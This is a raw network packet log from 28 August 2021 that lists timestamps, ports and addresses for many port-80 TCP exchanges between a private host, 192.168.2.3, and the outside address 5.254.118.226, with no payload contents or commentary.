Aug 28, 2021 00:07:00.962119102 CEST	49738	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.032870054 CEST	80	49739	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.033015966 CEST	49739	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.033390045 CEST	49739	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.038429976 CEST	80	49738	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.038507938 CEST	49738	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.043098927 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.043889999 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.098598957 CEST	80	49739	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.099296093 CEST	49739	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.105485916 CEST	80	49738	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.152041912 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.156362057 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.164901018 CEST	80	49739	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.235677958 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.236258030 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.370343924 CEST	80	49739	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.370557070 CEST	80	49738	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.370743036 CEST	80	49739	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.371017933 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.371138096 CEST	49739	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.374165058 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.380512953 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.382129908 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.477601051 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.478282928 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.478416920 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.484091997 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.544811010 CEST	49738	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.550148010 CEST	49729	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.550508022 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.552164078 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.554101944 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.559660912 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.640456915 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.640552044 CEST	80	49729	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.640746117 CEST	49729	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.641042948 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.641063929 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.641197920 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.645695925 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.646742105 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.714329958 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.714387894 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.714682102 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.715071917 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.718394041 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.930416107 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.930715084 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:01.957941055 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:01.958133936 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.009462118 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.009515047 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.009668112 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.009778023 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.025316954 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.025547028 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.076993942 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077047110 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077075005 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077090979 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077208042 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077229977 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077274084 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077287912 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077325106 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077347040 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077405930 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077442884 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077482939 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077483892 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077517033 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077517986 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077550888 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077569962 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077585936 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077635050 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077668905 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077681065 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077708006 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077744961 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.077754974 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077780962 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.077841043 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.078330994 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.078371048 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.078463078 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.078502893 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.078505993 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.078536034 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.078556061 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.093403101 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.093601942 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.144392967 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.144423962 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.144603968 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.145317078 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.145344973 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.145371914 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.145648003 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.265891075 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268028975 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268069029 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268100977 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268130064 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268156052 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268182993 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268208981 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268234968 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.268261909 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.367119074 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.443489075 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.757760048 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.802706003 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.804186106 CEST	80	49741	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.804306984 CEST	49741	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.805097103 CEST	49742	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.840353012 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.840584993 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.872298956 CEST	80	49742	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:02.872495890 CEST	49742	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:02.872651100 CEST	49742	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.051269054 CEST	80	49742	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.051563025 CEST	49742	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.058069944 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.058217049 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.150712967 CEST	80	49742	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.151534081 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.151786089 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.273673058 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.273964882 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.427386045 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.427900076 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.428042889 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.428148031 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.428435087 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.430130005 CEST	49743	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.432416916 CEST	80	49742	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.434115887 CEST	80	49742	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.434220076 CEST	49742	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.553641081 CEST	80	49743	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.553862095 CEST	49743	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.558406115 CEST	49743	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.558537006 CEST	49743	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.565965891 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.655884027 CEST	80	49743	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.656030893 CEST	49743	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.657711983 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.801743984 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.802042007 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.802257061 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.802393913 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.815634012 CEST	80	49743	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.945511103 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.945537090 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:03.945653915 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:03.947309017 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.012940884 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.013232946 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.024316072 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.024379015 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.024621010 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.024744987 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.082446098 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.082494974 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.082683086 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.082746029 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.093852997 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.093889952 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.094089985 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.094155073 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.095304966 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.095493078 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.109549046 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.109585047 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.109611988 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.109730005 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.109831095 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.166204929 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.166286945 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.166347980 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.166436911 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.169826984 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.169867039 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.169883966 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.170023918 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.170063019 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.170588970 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.170696020 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.185395002 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.185571909 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.185606003 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.185739040 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.185832977 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:04.235563040 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.237812996 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.237871885 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.237904072 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.237927914 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.237955093 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.253261089 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.253314972 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.253340960 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.253366947 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.253391981 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:04.256526947 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.075676918 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.077172041 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.208175898 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.208384991 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.208534002 CEST	49744	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.210087061 CEST	49745	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.308840036 CEST	80	49745	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.308886051 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.308907986 CEST	80	49744	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.309133053 CEST	49745	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.309186935 CEST	49745	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.450784922 CEST	80	49745	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.450928926 CEST	49745	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.525603056 CEST	80	49745	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.727417946 CEST	80	49745	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.752196074 CEST	80	49745	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:05.752398968 CEST	49745	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:05.930143118 CEST	49745	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.366785049 CEST	49746	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.427947998 CEST	49739	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.428150892 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.432440996 CEST	80	49746	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.432586908 CEST	49746	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.432867050 CEST	49746	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.432991982 CEST	49746	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.508945942 CEST	80	49739	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.510070086 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.510185003 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.510404110 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.510545969 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.511183023 CEST	80	49746	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.511276960 CEST	49746	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.511337042 CEST	80	49746	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.511362076 CEST	80	49746	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.511455059 CEST	49746	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.516899109 CEST	49748	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.576215982 CEST	80	49746	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.576267958 CEST	80	49746	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577142000 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577275038 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577315092 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577354908 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577368021 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577398062 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577435970 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577452898 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577512980 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577543020 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577568054 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577581882 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577595949 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577620983 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577641964 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577697992 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577711105 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577771902 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.577790022 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.577841043 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.581423998 CEST	80	49748	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.581569910 CEST	49748	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.581824064 CEST	49748	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.581954002 CEST	49748	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.687475920 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.687673092 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.688548088 CEST	80	49748	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.688638926 CEST	49748	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.690043926 CEST	49749	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.691382885 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.691534042 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.752825022 CEST	80	49748	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.754812956 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.754862070 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.754878998 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.754897118 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.754913092 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.757270098 CEST	80	49749	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.757463932 CEST	49749	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.757829905 CEST	49749	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.757985115 CEST	49749	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.759628057 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.759661913 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.952903032 CEST	80	49749	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.952955008 CEST	80	49749	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.953038931 CEST	49749	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:09.955502987 CEST	80	49749	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:09.959471941 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.025252104 CEST	80	49749	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.026523113 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.026639938 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.026913881 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.027065039 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.070868015 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.095155954 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.095232964 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.095261097 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.095398903 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.095482111 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.138283014 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.138439894 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.140856981 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.178613901 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.178859949 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.179502010 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.179657936 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.179688931 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.179847002 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.213442087 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.213627100 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.215826035 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.216541052 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251221895 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251280069 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251302958 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251348019 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251384974 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251419067 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251456976 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251466036 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.251492023 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.251534939 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.251564980 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.251578093 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.251584053 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.284054041 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.284238100 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.284549952 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.284683943 CEST	49747	80	192.168.2.3	5.254.118.226
